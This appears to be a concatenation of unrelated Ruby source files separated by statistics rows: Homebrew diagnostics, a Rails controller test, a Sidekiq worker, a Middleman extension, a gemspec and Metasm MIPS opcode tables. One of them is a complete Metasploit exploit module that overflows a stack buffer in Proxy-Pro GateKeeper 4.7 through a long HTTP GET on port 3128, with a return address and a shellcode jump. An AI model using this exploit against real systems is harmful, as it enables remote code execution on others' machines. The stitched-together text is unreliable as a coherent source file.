Putting non-prefixed coreutils in your path can cause gmp builds to fail.
EOS
rescue FormulaUnavailableError
end
def check_for_non_prefixed_findutils
return unless OS.mac?
findutils = Formula["findutils"]
return unless findutils.any_version_installed?
gnubin = %W[#{findutils.opt_libexec}/gnubin #{findutils.libexec}/gnubin]
default_names = Tab.for_name("findutils").with? "default-names"
return if !default_names && (paths & gnubin).empty?
<<-EOS.undent
Putting non-prefixed findutils in your path can cause python builds to fail.
EOS
rescue FormulaUnavailableError
end
def check_for_pydistutils_cfg_in_home
return unless File.exist? "#{ENV["HOME"]}/.pydistutils.cfg"
<<-EOS.undent
A .pydistutils.cfg file was found in $HOME, which may cause Python
builds to fail. See:
#{Formatter.url("https://bugs.python.org/issue6138")}
#{Formatter.url("https://bugs.python.org/issue4655")}
EOS
end
def check_for_unlinked_but_not_keg_only
unlinked = Formula.racks.reject do |rack|
if !(HOMEBREW_LINKED_KEGS/rack.basename).directory?
begin
Formulary.from_rack(rack).keg_only?
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
false
end
else
true
end
end.map(&:basename)
return if unlinked.empty?
inject_file_list unlinked, <<-EOS.undent
You have unlinked kegs in your Cellar
Leaving kegs unlinked can lead to build-trouble and cause brews that depend on
those kegs to fail to run properly once built. Run `brew link` on these:
EOS
end
def check_for_old_env_vars
return unless ENV["HOMEBREW_KEEP_INFO"]
<<-EOS.undent
`HOMEBREW_KEEP_INFO` is no longer used
info files are no longer deleted by default; you may
remove this environment variable.
EOS
end
def check_for_pth_support
homebrew_site_packages = Language::Python.homebrew_site_packages
return unless homebrew_site_packages.directory?
return if Language::Python.reads_brewed_pth_files?("python") != false
return unless Language::Python.in_sys_path?("python", homebrew_site_packages)
user_site_packages = Language::Python.user_site_packages "python"
<<-EOS.undent
Your default Python does not recognize the Homebrew site-packages
directory as a special site-packages directory, which means that .pth
files will not be followed. This means you will not be able to import
some modules after installing them with Homebrew, like wxpython. To fix
this for the current user, you can run:
mkdir -p #{user_site_packages}
echo 'import site; site.addsitedir("#{homebrew_site_packages}")' >> #{user_site_packages}/homebrew.pth
EOS
end
def check_for_external_cmd_name_conflict
cmds = paths.flat_map { |p| Dir["#{p}/brew-*"] }.uniq
cmds = cmds.select { |cmd| File.file?(cmd) && File.executable?(cmd) }
cmd_map = {}
cmds.each do |cmd|
cmd_name = File.basename(cmd, ".rb")
cmd_map[cmd_name] ||= []
cmd_map[cmd_name] << cmd
end
cmd_map.reject! { |_cmd_name, cmd_paths| cmd_paths.size == 1 }
return if cmd_map.empty?
message = "You have external commands with conflicting names.\n"
cmd_map.each do |cmd_name, cmd_paths|
message += inject_file_list cmd_paths, <<-EOS.undent
Found command `#{cmd_name}` in following places:
EOS
end
message
end
def check_for_tap_ruby_files_locations
bad_tap_files = {}
Tap.each do |tap|
unused_formula_dirs = tap.potential_formula_dirs - [tap.formula_dir]
unused_formula_dirs.each do |dir|
next unless dir.exist?
dir.children.each do |path|
next unless path.extname == ".rb"
bad_tap_files[tap] ||= []
bad_tap_files[tap] << path
end
end
end
return if bad_tap_files.empty?
bad_tap_files.keys.map do |tap|
<<-EOS.undent
Found Ruby file outside #{tap} tap formula directory
(#{tap.formula_dir}):
#{bad_tap_files[tap].join("\n ")}
EOS
end.join("\n")
end
def all
methods.map(&:to_s).grep(/^check_/)
end
end # end class Checks
end
end
require "extend/os/diagnostic"
| 35.834081 | 114 | 0.615292 |
e27e69526b9cfbb02de765f652558694c52bfe99 | 1,794 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Proxy-Pro Professional
GateKeeper 4.7. By sending a long HTTP GET to the default port
of 3128, a remote attacker could overflow a buffer and execute
arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2004-0326'],
['OSVDB', '4027'],
['BID', '9716'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00+&=%\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
],
'Privileged' => true,
'DisclosureDate' => 'Feb 23 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3128)
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = "GET /" + rand_text_english(3603, payload_badchars)
sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"
sock.put(sploit)
sock.get_once(-1, 3)
handler
disconnect
end
end
| 24.243243 | 84 | 0.593645 |
614d95dcf4f3410594ead431b8ee3d0d2a596e4c | 506 | require 'rails_helper'
RSpec.describe Experts::ReservesController, type: :controller do
describe "予約一覧画面" do
before do
@reserve1 = FactoryBot.create(:reserve)
@reserve2 = FactoryBot.create(:reserve)
login_expert(@reserve1.expert)
end
it "予約一覧画面 予約が取得できていること テンプレートが表示されること" do
get :index
expect(assigns(:reserves)).to include @reserve1
expect(assigns(:reserves)).not_to include @reserve2
expect(response).to render_template :index
end
end
end
| 28.111111 | 64 | 0.705534 |
21f9497c15316a708402dbd4aee0edf5b006a9eb | 182 | # frozen_string_literal: true
module SensuPluginsChef
module Version
MAJOR = 7
MINOR = 1
PATCH = 1
VER_STRING = [MAJOR, MINOR, PATCH].compact.join('.')
end
end
| 15.166667 | 56 | 0.659341 |
384f8457508fe270bf5d0e1e914c576725bab5a9 | 765 | class BufferedStreamClient
class BufferActionWorker
include Sidekiq::Worker
sidekiq_options queue: 'soon'
def perform(group, id, method, *parameters)
if method == 'unfollow'
target_group, target_id, options = parameters
return @buffer.unfollow_buffer.push(
options.merge(
source: "#{group}:#{id}",
target: "#{target_group}:#{target_id}"
)
)
end
if group && id
Librato.increment("getstream.#{method}.total", feed_group: group)
StreamRails.client.feed(group, id).public_send(method, *parameters)
else
Librato.increment("getstream.#{method}.total")
StreamRails.client.public_send(method, *parameters)
end
end
end
end
| 29.423077 | 75 | 0.622222 |
6227feaaadea75cd3f8cd31a44cdb6955a29ca50 | 2,322 | # frozen_string_literal: true
class Middleman::Extensions::AssetHost < ::Middleman::Extension
option :host, nil, 'The asset host to use or a Proc to determine asset host', required: true
option :exts, nil, 'List of extensions that get cache busters strings appended to them.'
option :sources, %w[.css .htm .html .js .mjs .php .xhtml], 'List of extensions that are searched for bustable assets.'
option :ignore, [], 'Regexes of filenames to skip adding query strings to'
option :rewrite_ignore, [], 'Regexes of filenames to skip processing for host rewrites'
def initialize(app, options_hash = ::Middleman::EMPTY_HASH, &block)
super
require 'set'
@set_of_exts = Set.new(options.exts || app.config[:asset_extensions])
@set_of_sources = Set.new options.sources
end
Contract IsA['Middleman::Sitemap::ResourceListContainer'] => Any
def manipulate_resource_list_container!(resource_list)
resource_list.by_extensions(@set_of_sources).each do |r|
next if Array(options.rewrite_ignore || []).any? do |i|
::Middleman::Util.path_match(i, "/#{r.destination_path}")
end
r.add_filter ::Middleman::InlineURLRewriter.new(:asset_host,
app,
r,
after_filter: :asset_hash,
url_extensions: @set_of_exts,
ignore: options.ignore,
proc: method(:rewrite_url))
end
end
Contract String, Or[String, Pathname], Any => String
def rewrite_url(asset_path, dirpath, _request_path)
uri = ::Middleman::Util.parse_uri(asset_path)
relative_path = uri.path[0..0] != '/'
full_asset_path = if relative_path
dirpath.join(asset_path).to_s
else
asset_path
end
asset_prefix = case options[:host]
when Proc
options[:host].call(full_asset_path)
when String
options[:host]
end
File.join(asset_prefix, full_asset_path)
end
memoize :rewrite_url
end
| 40.736842 | 120 | 0.567614 |
1dcebd9598015a5c1d279be5c89ac29e1c1948ee | 1,272 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'paperclip/av/transcoder/version'
Gem::Specification.new do |spec|
spec.name = "paperclip-av-transcoder"
spec.version = Paperclip::Av::Transcoder::VERSION
spec.authors = ["Omar Abdel-Wahab"]
spec.email = ["[email protected]"]
spec.summary = %q{Audio/Video Transcoder for Paperclip using FFMPEG/Avconv}
spec.description = %q{Audio/Video Transcoder for Paperclip using FFMPEG/Avconv}
spec.homepage = "https://github.com/ruby-av/paperclip-av-transcoder"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.6"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec", "~> 3.0.0"
spec.add_development_dependency "rails", ">= 4.0.0"
spec.add_development_dependency "sqlite3"
spec.add_development_dependency "coveralls"
spec.add_dependency "paperclip", ">=2.5.2"
spec.add_dependency "av", ">= 0.7.1"
end
| 41.032258 | 83 | 0.683962 |
4a61e583b3a2929be62954b070047263061fe8bf | 37 | module Fewer
VERSION = '0.3.0'
end
| 9.25 | 19 | 0.648649 |
f86ad99e4473f34630045012d9e2e9c37d2c5cfd | 613 | cask "qlcolorcode" do
version "4.0.2"
sha256 "07d11cc54a28c2015b9cf298c4fe4a6fc3de14b9f2fd5f486de0d349fa4c3ee9"
url "https://github.com/anthonygelibert/QLColorCode/releases/download/release-#{version}/QLColorCode.qlgenerator.zip"
appcast "https://github.com/anthonygelibert/QLColorCode/releases.atom"
name "QLColorCode"
desc "QuickLook plug-in that renders source code with syntax highlighting"
homepage "https://github.com/anthonygelibert/QLColorCode"
depends_on macos: ">= :catalina"
qlplugin "QLColorCode.qlgenerator"
zap trash: "~/Library/Preferences/org.n8gray.QLColorCode.plist"
end
| 36.058824 | 119 | 0.792822 |
1d399fef3f8ce75d1834788e8d954f1a65b0dd92 | 2,719 | require 'init_test'
require 'rest_client'
describe Patriot::Worker::InfoServer do
context "default config" do
before :all do
@config = config_for_test('worker')
port = @config.get(Patriot::Worker::InfoServer::PORT_KEY,
Patriot::Worker::InfoServer::DEFAULT_PORT)
@url = "http://127.0.0.1:#{port}"
username = @config.get(Patriot::Util::Config::USERNAME_KEY, "")
password = @config.get(Patriot::Util::Config::PASSWORD_KEY, "")
@auth = 'Basic ' + Base64.encode64("#{username}:#{password}").chomp
@worker = Patriot::Worker::MultiNodeWorker.new(@config)
@job1 = TestEnvironment.build_job()
@job2 = TestEnvironment.build_job()
@job_store = @worker.instance_variable_get(:@job_store)
@update_id = Time.now.to_i
@job_store.register(@update_id, [@job1,@job2])
@info_server = @worker.instance_variable_get(:@info_server)
@info_server.start_server
sleep 1
end
before :each do
@worker.instance_variable_set(:@status, Patriot::Worker::Status::ACTIVE)
end
after :all do
@info_server.shutdown_server
end
describe "WorkerServlet" do
it "should controll status (to be modified)" do
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::ACTIVE
expect(RestClient.get("#{@url}/worker")).to match Patriot::Worker::Status::ACTIVE
resource = RestClient::Resource.new("#{@url}/worker/status")
resource.put({:status => Patriot::Worker::Status::SLEEP}, :Authorization => @auth )
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::SLEEP
expect(RestClient.get("#{@url}/worker")).to match Patriot::Worker::Status::SLEEP
end
it "should controll worker status" do
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::ACTIVE
expect(RestClient.get("#{@url}/worker/status")).to match Patriot::Worker::Status::ACTIVE
resource = RestClient::Resource.new("#{@url}/worker/status")
resource.put({:status => Patriot::Worker::Status::SLEEP}, :Authorization => @auth )
expect(@worker.instance_variable_get(:@status)).to eq Patriot::Worker::Status::SLEEP
expect(RestClient.get("#{@url}/worker/status")).to match Patriot::Worker::Status::SLEEP
end
end
describe "JobServlet" do
it "should return job status" do
job_status = RestClient.get("#{@url}/jobs/#{@job1.job_id}", :accept => :json)
json = JSON.parse(job_status)
expect(json["job_id"]).to eq @job1.job_id
expect(json["state"]).to eq Patriot::JobStore::JobState::WAIT
end
end
end
end
| 41.19697 | 96 | 0.653917 |
7941f213c09f858f7ded61b1d46cfc03f285eccd | 1,156 | # frozen_string_literal: true
require_relative '../base'
module Fusuma
module Plugin
module Parsers
# Parser change record and tag in event
# Inherite this base class
class Parser < Base
# Parse Event and convert Record and Tag
# if `#parse_record` return nil, this method will return original event
# @param event [Event]
# @return [Event]
def parse(event)
return event if event.tag != source
new_record = parse_record(event.record)
return event if new_record.nil?
event.record = new_record
event.tag = tag
event
end
# Set source for tag from config.yml.
# DEFAULT_SOURCE is defined in each Parser plugins.
def source
@source ||= config_params(:source) || self.class.const_get('DEFAULT_SOURCE')
end
def tag
@tag ||= self.class.name.split('::').last.underscore
end
# parse Record object
# @param _record [Record]
# @return [Record, nil]
def parse_record(_record)
nil
end
end
end
end
end
| 25.130435 | 86 | 0.58391 |
289449f6785436aafd113969e11c6f24cd4f97ca | 813 | # Be sure to restart your server when you modify this file.
# Add new inflection rules using the following format. Inflections
# are locale specific, and you may define rules for as many different
# locales as you wish. All of these examples are active by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.plural /^(ox)$/i, '\1en'
# inflect.singular /^(ox)en/i, '\1'
# inflect.irregular 'person', 'people'
# inflect.uncountable %w( fish sheep )
# end
# These inflection rules are supported but not enabled by default:
# ActiveSupport::Inflector.inflections(:en) do |inflect|
# inflect.acronym 'RESTful'
# end
ActiveSupport::Inflector.inflections(:en) do |inflect|
# Here you can put the singular and plural form you expect
inflect.irregular 'regatta', 'regattas'
end
| 38.714286 | 69 | 0.734317 |
615932b8417ba650e56d7862463e0caf9be845f8 | 580 | class AppEnvironmentPolicy
RESERVED_ENV_VAR_ERROR_MSG = 'reserved_key:%s'
def initialize(app)
@errors = app.errors
@environment_json = app.environment_json
end
def validate
return if @environment_json.nil?
unless @environment_json.is_a?(Hash)
@errors.add(:environment_json, :invalid_environment)
return
end
@environment_json.keys.each do |k|
@errors.add(:environment_json, RESERVED_ENV_VAR_ERROR_MSG % k) if k =~ /^(vcap|vmc)_/i
end
rescue MultiJson::ParseError
@errors.add(:environment_json, :invalid_json)
end
end
| 26.363636 | 92 | 0.717241 |
91728d0ce4eb08525cda07e558d9c8af78f7521a | 18,702 | # This file is part of Metasm, the Ruby assembly manipulation suite
# Copyright (C) 2007 Yoann GUILLOT
#
# Licence is LGPL, see LICENCE in the top-level directory
require 'metasm/mips/main'
# TODO coprocessors, floating point, 64bits, thumb mode
module Metasm
class MIPS
private
def addop(name, bin, *args)
o = Opcode.new name
o.bin = bin
o.args.concat(args & @fields_mask.keys)
(args & @valid_props).each { |p| o.props[p] = true }
if $DEBUG
a = (args - @valid_props - @fields_mask.keys)
p ['mips unhandled args',a] if not a.empty?
end
@opcode_list << o
end
def init_mips32_obsolete
addop 'beql', 0b010100 << 26, :rt, :rs, :i16, :setip # == , exec delay slot only if jump taken
addop 'bnel', 0b010101 << 26, :rt, :rs, :i16, :setip # !=
addop 'blezl',0b010110 << 26, :rt_z, :rs, :i16, :setip # <= 0
addop 'bgtzl',0b010111 << 26, :rt_z, :rs, :i16, :setip # > 0
addop 'bltzl',1 << 26 | 0b00010 << 16, :rs, :i16, :setip
addop 'bgezl',1 << 26 | 0b00011 << 16, :rs, :i16, :setip
addop 'bltzall', 1 << 26 | 0b10010 << 16, :rs, :i16, :setip
addop 'bgezall', 1 << 26 | 0b10011 << 16, :rs, :i16, :setip
end
def init_mips32_reserved
addop 'future111011', 0b111011 << 26, :i26
%w[011000 011001 011010 011011 100111 101100 101101 110100 110111 111100 111111].each { |b|
addop "reserved#{b}", b.to_i(2) << 26, :i26
}
addop 'ase_jalx', 0b011101 << 26, :i26
addop 'ase011110', 0b011110 << 26, :i26
# TODO add all special/regimm/...
end
def init_mips32
@opcode_list = []
@fields_mask.update :rs => 0x1f, :rt => 0x1f, :rd => 0x1f, :sa => 0x1f,
:i16 => 0xffff, :i26 => 0x3ffffff, :rs_i16 => 0x3e0ffff, :it => 0x1f,
:ft => 0x1f, :idm1 => 0x1f, :idb => 0x1f, :sel => 7, :i20 => 0xfffff #, :i32 => 0
@fields_shift.update :rs => 21, :rt => 16, :rd => 11, :sa => 6,
:i16 => 0, :i26 => 0, :rs_i16 => 0, :it => 16,
:ft => 16, :idm1 => 11, :idb => 11, :sel => 0, :i20 => 6 #, :i32 => 0
init_mips32_obsolete
init_mips32_reserved
addop 'j', 0b000010 << 26, :i26, :setip, :stopexec # sets the program counter to (i26 << 2) | ((pc+4) & 0xfc000000) ie i26*4 in the 256M-aligned section containing the instruction in the delay slot
addop 'jal', 0b000011 << 26, :i26, :setip, :stopexec, :saveip # same thing, saves return addr in r31
addop 'mov', 0b001000 << 26, :rt, :rs # rt <- rs+0
addop 'addi', 0b001000 << 26, :rt, :rs, :i16 # add rt <- rs+i
addop 'li', 0b001001 << 26, :rt, :i16 # add $0 # XXX liu ?
addop 'addiu',0b001001 << 26, :rt, :rs, :i16 # add unsigned
addop 'slti', 0b001010 << 26, :rt, :rs, :i16 # set on less than
addop 'sltiu',0b001011 << 26, :rt, :rs, :i16 # set on less than unsigned
addop 'andi', 0b001100 << 26, :rt, :rs, :i16 # and
addop 'li', 0b001101 << 26, :rt, :i16 # or $0
addop 'ori', 0b001101 << 26, :rt, :rs, :i16 # or
addop 'xori', 0b001110 << 26, :rt, :rs, :i16 # xor
addop 'lui', 0b001111 << 26, :rt, :i16 # load upper
# addop 'li', (0b001111 << 26) << 32 | (0b001101 << 26), :rt_64, :i32 # lui + ori
addop 'b', 0b000100 << 26, :i16, :setip, :stopexec # bz $zero
addop 'bz', 0b000100 << 26, :rs, :i16, :setip # == 0 (beq $0)
addop 'bz', 0b000100 << 26, :rt, :i16, :setip # == 0
addop 'bnz', 0b000101 << 26, :rs, :i16, :setip # != 0
addop 'bnz', 0b000101 << 26, :rt, :i16, :setip # != 0
addop 'beq', 0b000100 << 26, :rt, :rs, :i16, :setip # ==
addop 'bne', 0b000101 << 26, :rt, :rs, :i16, :setip # !=
addop 'blez', 0b000110 << 26, :rs, :i16, :setip # <= 0
addop 'bgtz', 0b000111 << 26, :rs, :i16, :setip # > 0
addop 'lb', 0b100000 << 26, :rt, :rs_i16 # load byte rs <- [rt+i]
addop 'lh', 0b100001 << 26, :rt, :rs_i16 # load halfword
addop 'lwl', 0b100010 << 26, :rt, :rs_i16 # load word left
addop 'lw', 0b100011 << 26, :rt, :rs_i16 # load word
addop 'lbu', 0b100100 << 26, :rt, :rs_i16 # load byte unsigned
addop 'lhu', 0b100101 << 26, :rt, :rs_i16 # load halfword unsigned
addop 'lwr', 0b100110 << 26, :rt, :rs_i16 # load word right
addop 'sb', 0b101000 << 26, :rt, :rs_i16 # store byte
addop 'sh', 0b101001 << 26, :rt, :rs_i16 # store halfword
addop 'swl', 0b101010 << 26, :rt, :rs_i16 # store word left
addop 'sw', 0b101011 << 26, :rt, :rs_i16 # store word
addop 'swr', 0b101110 << 26, :rt, :rs_i16 # store word right
addop 'll', 0b110000 << 26, :rt, :rs_i16 # load linked word (read for atomic r/modify/w, sc does the w)
addop 'sc', 0b111000 << 26, :rt, :rs_i16 # store conditional word
addop 'lwc1', 0b110001 << 26, :ft, :rs_i16 # load word in fpreg low
addop 'swc1', 0b111001 << 26, :ft, :rs_i16 # store low fpreg word
addop 'lwc2', 0b110010 << 26, :rt, :rs_i16 # load word to copro2 register low
addop 'swc2', 0b111010 << 26, :rt, :rs_i16 # store low coproc2 register
addop 'ldc1', 0b110101 << 26, :ft, :rs_i16 # load dword in fpreg low
addop 'sdc1', 0b111101 << 26, :ft, :rs_i16 # store fpreg
addop 'ldc2', 0b110110 << 26, :rt, :rs_i16 # load dword to copro2 register
addop 'sdc2', 0b111110 << 26, :rt, :rs_i16 # store coproc2 register
addop 'pref', 0b110011 << 26, :it, :rs_i16 # prefetch (it = %w[load store r2 r3 load_streamed store_streamed load_retained store_retained
# r8 r9 r10 r11 r12 r13 r14 r15 r16 r17 r18 r19 r20 r21 r22 r23 r24 writeback_invalidate
# id26 id27 id28 id29 prepare_for_store id31]
addop 'cache',0b101111 << 26, :it, :rs_i16 # do things with the proc cache
# special
addop 'nop', 0
addop 'ssnop',1<<6
addop 'ehb', 3<<6
addop 'sll', 0b000000, :rd, :rt, :sa
addop 'movf', 0b000001, :rd, :rs, :cc
addop 'movt', 0b000001 | (1<<16), :rd, :rs, :cc
addop 'srl', 0b000010, :rd, :rt, :sa
addop 'sra', 0b000011, :rd, :rt, :sa
addop 'sllv', 0b000100, :rd, :rt, :rs
addop 'srlv', 0b000110, :rd, :rt, :rs
addop 'srav', 0b000111, :rd, :rt, :rs
addop 'jr', 0b001000, :rs, :setip, :stopexec # hint field ?
addop 'jr.hb',0b001000 | (1<<10), :rs, :setip, :stopexec
addop 'jalr', 0b001001 | (31<<11), :rs, :setip, :stopexec, :saveip # rd = r31 implicit
addop 'jalr', 0b001001, :rd, :rs, :setip, :stopexec, :saveip
addop 'jalr.hb', 0b001001 | (1<<10) | (31<<11), :rs, :setip, :stopexec, :saveip
addop 'jalr.hb', 0b001001 | (1<<10), :rd, :rs, :setip, :stopexec, :saveip
addop 'movz', 0b001010, :rd, :rs, :rt # rt == 0 ? rd <- rs
addop 'movn', 0b001011, :rd, :rs, :rt
addop 'syscall', 0b001100, :i20
addop 'break',0b001101, :i20, :stopexec
addop 'sync', 0b001111 # type 0 implicit
addop 'sync', 0b001111, :sa
addop 'mfhi', 0b010000, :rd # copies special reg HI to reg
addop 'mthi', 0b010001, :rd # copies reg to special reg HI
addop 'mflo', 0b010010, :rd # copies special reg LO to reg
addop 'mtlo', 0b010011, :rd # copies reg to special reg LO
addop 'mult', 0b011000, :rs, :rt # multiplies the registers and store the result in HI:LO
addop 'multu',0b011001, :rs, :rt
addop 'div', 0b011010, :rs, :rt
addop 'divu', 0b011011, :rs, :rt
addop 'add', 0b100000, :rd, :rs, :rt
addop 'addu', 0b100001, :rd, :rs, :rt
addop 'sub', 0b100010, :rd, :rs, :rt
addop 'subu', 0b100011, :rd, :rs, :rt
addop 'and', 0b100100, :rd, :rs, :rt
addop 'or', 0b100101, :rd, :rs, :rt
addop 'xor', 0b100110, :rd, :rs, :rt
addop 'not', 0b100111, :rd, :rt # nor $0
addop 'not', 0b100111, :rd, :rs
addop 'nor', 0b100111, :rd, :rs, :rt
addop 'slt', 0b101010, :rd, :rs, :rt # rs<rt ? rd<-1 : rd<-0
addop 'sltu', 0b101011, :rd, :rs, :rt
addop 'tge', 0b110000, :rs, :rt # rs >= rt ? trap
addop 'tgeu', 0b110001, :rs, :rt
addop 'tlt', 0b110010, :rs, :rt
addop 'tltu', 0b110011, :rs, :rt
addop 'teq', 0b110100, :rs, :rt
addop 'tne', 0b110110, :rs, :rt
# regimm
addop 'bltz', (1<<26) | (0b00000<<16), :rs, :i16, :setip
addop 'bgez', (1<<26) | (0b00001<<16), :rs, :i16, :setip
addop 'tgei', (1<<26) | (0b01000<<16), :rs, :i16, :setip
addop 'tgfiu',(1<<26) | (0b01001<<16), :rs, :i16, :setip
addop 'tlti', (1<<26) | (0b01010<<16), :rs, :i16, :setip
addop 'tltiu',(1<<26) | (0b01011<<16), :rs, :i16, :setip
addop 'teqi', (1<<26) | (0b01100<<16), :rs, :i16, :setip
addop 'tnei', (1<<26) | (0b01110<<16), :rs, :i16, :setip
addop 'bltzal', (1<<26) | (0b10000<<16), :rs, :i16, :setip
addop 'bgezal', (1<<26) | (0b10001<<16), :rs, :i16, :setip
# special2
addop 'madd', (0b011100<<26) | 0b000000, :rs, :rt
addop 'maddu',(0b011100<<26) | 0b000001, :rs, :rt
addop 'mul', (0b011100<<26) | 0b000010, :rd, :rs, :rt
addop 'msub', (0b011100<<26) | 0b000100, :rs, :rt
addop 'msubu',(0b011100<<26) | 0b000101, :rs, :rt
addop 'clz', (0b011100<<26) | 0b100000, :rd, :rs, :rt # must have rs == rt
addop 'clo', (0b011100<<26) | 0b100001, :rd, :rs, :rt # must have rs == rt
addop 'sdbbp',(0b011100<<26) | 0b111111, :i20
# cp0
addop 'mfc0', (0b010000<<26) | (0b00000<<21), :rt, :rd
addop 'mfc0', (0b010000<<26) | (0b00000<<21), :rt, :rd, :sel
addop 'mtc0', (0b010000<<26) | (0b00100<<21), :rt, :rd
addop 'mtc0', (0b010000<<26) | (0b00100<<21), :rt, :rd, :sel
addop 'tlbr', (0b010000<<26) | (1<<25) | 0b000001
addop 'tlbwi',(0b010000<<26) | (1<<25) | 0b000010
addop 'tlbwr',(0b010000<<26) | (1<<25) | 0b000110
addop 'tlbp', (0b010000<<26) | (1<<25) | 0b001000
addop 'eret', (0b010000<<26) | (1<<25) | 0b011000
addop 'deret',(0b010000<<26) | (1<<25) | 0b011111
addop 'wait', (0b010000<<26) | (1<<25) | 0b100000 # mode field ?
end
def init_mips32r2
init_mips32
addop 'rotr', 0b000010 | (1<<21), :rd, :rt, :sa
addop 'rotrv',0b000110 | (1<<6), :rd, :rt, :rs
addop 'synci',(1<<26) | (0b11111<<16), :rs_i16
# special3
addop 'ext', (0b011111<<26) | 0b000000, :rt, :rs, :sa, :idm1
addop 'ins', (0b011111<<26) | 0b000100, :rt, :rs, :sa, :idb
addop 'rdhwr',(0b011111<<26)| 0b111011, :rt, :rd
addop 'wsbh',(0b011111<<26) | (0b00010<<6) | 0b100000, :rd, :rt
addop 'seb', (0b011111<<26) | (0b10000<<6) | 0b100000, :rd, :rt
addop 'seh', (0b011111<<26) | (0b11000<<6) | 0b100000, :rd, :rt
# cp0
addop 'rdpgpr', (0b010000<<26) | (0b01010<<21), :rd, :rt
addop 'wrpgpr', (0b010000<<26) | (0b01110<<21), :rd, :rt
addop 'di', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (0<<5)
addop 'di', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (0<<5), :rt
addop 'ei', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (1<<5)
addop 'ei', (0b010000<<26) | (0b01011<<21) | (0b01100<<11) | (1<<5), :rt
end
alias init_latest init_mips32r2
end
end
__END__
def macro_addop_cop1(name, bin, *aprops)
flds = [ :rt, :fs ]
addop name, :cop1, bin, 'rt, fs', flds, *aprops
end
def macro_addop_cop1_precision(name, type, bin, fmt, *aprops)
flds = [ :ft, :fs, :fd ]
addop name+'.'+(type.to_s[5,7]), type, bin, fmt, flds, *aprops
end
public
# Initialize the instruction set with the MIPS32 Instruction Set
def init_mips32
:cc => [7, 18, :fpcc],
:op => [0x1F, 16, :op ], :cp2_rt => [0x1F, 16, :cp2_reg ],
:stype => [0x1F, 6, :imm ],
:code => [0xFFFFF, 6, :code ],
:sel => [3, 0, :sel ]})
# ---------------------------------------------------------------
# COP0, field rs
# ---------------------------------------------------------------
addop 'mfc0', :cop0, 0b00000, 'rt, rd, sel', [ :rt, :rd, :sel ]
addop 'mtc0', :cop0, 0b00100, 'rt, rd, sel', [ :rt, :rd, :sel ]
# ---------------------------------------------------------------
# COP0 when rs=C0
# ---------------------------------------------------------------
macro_addop_cop0_c0 'tlbr', 0b000001
macro_addop_cop0_c0 'tlbwi', 0b000010
macro_addop_cop0_c0 'tlwr', 0b000110
macro_addop_cop0_c0 'tlbp', 0b001000
macro_addop_cop0_c0 'eret', 0b011000
macro_addop_cop0_c0 'deret', 0b011111
macro_addop_cop0_c0 'wait', 0b100000
# ---------------------------------------------------------------
# COP1, field rs
# ---------------------------------------------------------------
macro_addop_cop1 'mfc1', 0b00000
macro_addop_cop1 'cfc1', 0b00010
macro_addop_cop1 'mtc1', 0b00100
macro_addop_cop1 'ctc1', 0b00110
addop "bc1f", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 0 ]
addop "bc1fl", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 2 ]
addop "bc1t", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 1 ]
addop "bc1tl", :cop1, 0b01000, 'cc, off', [ :cc, :off ], :diff_bits, [ 16, 3, 3 ]
# ---------------------------------------------------------------
# COP1, field rs=S/D
# ---------------------------------------------------------------
[ :cop1_s, :cop1_d ].each do |type|
type_str = type.to_s[5,7]
macro_addop_cop1_precision 'add', type, 0b000000, 'fd, fs, ft'
macro_addop_cop1_precision 'sub', type, 0b000001, 'fd, fs, ft'
macro_addop_cop1_precision 'mul', type, 0b000010, 'fd, fs, ft'
macro_addop_cop1_precision 'abs', type, 0b000101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'mov', type, 0b000110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'neg', type, 0b000111, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'movz', type, 0b010010, 'fd, fs, ft'
macro_addop_cop1_precision 'movn', type, 0b010011, 'fd, fs, ft'
addop "movf.#{type_str}", type, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ], :diff_bits, [ 16, 1, 0 ]
addop "movt.#{type_str}", type, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ], :diff_bits, [ 16, 1, 1 ]
%w(f un eq ueq olt ult ole ule sf ngle seq ngl lt nge le ngt).each_with_index do |cond, index|
addop "c.#{cond}.#{type_str}", type, 0b110000+index, 'cc, fs, ft',
[ :ft, :fs, :cc ]
end
end
# S and D Without PS
